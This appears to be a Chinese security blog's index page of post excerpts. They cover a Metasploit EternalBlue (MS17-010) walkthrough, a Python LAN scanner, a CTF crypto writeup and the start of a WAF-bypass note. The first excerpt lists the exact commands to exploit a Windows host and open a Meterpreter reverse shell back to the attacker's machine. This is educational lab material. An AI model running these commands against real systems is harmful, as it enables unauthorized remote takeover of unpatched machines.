MSF获取Windows的shell后
扫描器的使用use auxiliary/scanner/smb/smb_ms17_010 攻击模块的使用下一步操作:发起攻击 (Exploit) 既然扫描器已经告诉你目标是“易受攻击”的,你现在的动作应该是从 辅助模块(Scanner) 切换到 攻击模块(Exploit)。 请按照以下顺序输入命令: 切换模块: Bash 1use exploit/windows/smb/ms17_010_eternalblue 设置目标 IP: Bash 1set RHOSTS 192.168.20.135 设置攻击载荷(通常默认就是这个,但建议检查一下): Bash 1set PAYLOAD windows/x64/meterpreter/reverse_tcp 设置你自己的 IP(Kali 的 IP,用于接收反弹回来的 Shell): Bash 12# 先在另一个终端用 ip addr 确认你的网卡 IPset LHOST [你的Kali的IP] 开火攻击: Bash 1exploit 进入Windows之后的操作 1. 基础环境与权限感知在任何操作...
局域网主机扫描
🌐 局域网扫描器 - 开发与使用文档项目地址:https://github.com/benbenbendang/scanner_nmap 1. 项目简介本项目是一个基于 Python 开发的局域网主机扫描工具。它不仅具备强大的网络探测功能,更拥有独特的赛博朋克 (Cyberpunk) 风格图形界面。软件旨在帮助网络管理员或极客用户快速识别当前网段内的存活主机、检测操作系统类型以及开放端口。 2. 功能特性 (Features)🛠 核心功能 网卡自动识别:启动时自动读取系统网络接口信息(IP/子网掩码),支持用户下拉选择目标网卡。 ARP 存活扫描:利用 ARP 协议(二层网络)快速、准确地发现同一局域网内的所有在线设备。 操作系统指纹识别:通过发送 ICMP 数据包并分析 TTL(生存时间)值,启发式地判断目标是 Windows、Linux/Android 还是网络设备。 端口安全检测:对发现的主机进行常用端口(如 21, 22, 80, 445, 3389 等)扫描,评估开放服务情况。 多线程处理:扫描过程在独立线程中运行,保证界面流畅不卡顿,并提供实...
第二届“Parloo”CTF应急响应挑战赛-学生组(CTF)
title: 第二届Parloo杯CTF应急响应挑战赛date: 2025-05-18 13:23:32categories: 网络安全tags: ctf 网络安全 应急响应 密码学 python banner_img: /img/df0fd0ee5e9bd441452f544d6a3b6250.png banner_img_height: 84 banner_mask_alpha: 0.3 Crypto循环锁链12311 0D 19 0E 12 2A 74 42 31 2B 25 00 07 0C 16 3927 21 03 00 28 0D 27 20 26 2C 19 00 0C 3B 04 3922 19 52 44 0D 还原思路简述 加密逻辑猜测 题面提示“每个字节被锁在一个无尽的循环中”,很像典型的环形 XOR: 1c[i] = p[i] ⊕ p[(i+1) mod N] (0 ≤ i < N) 其中 p 为明文,c 为给出的 37 字节密文。 利用已知前缀定位“起点” 已知 flag 以 1pal...
WAF的常见绕过方法
1这个是网上看到的二向箔WAF资料,感觉挺好的,借鉴一下









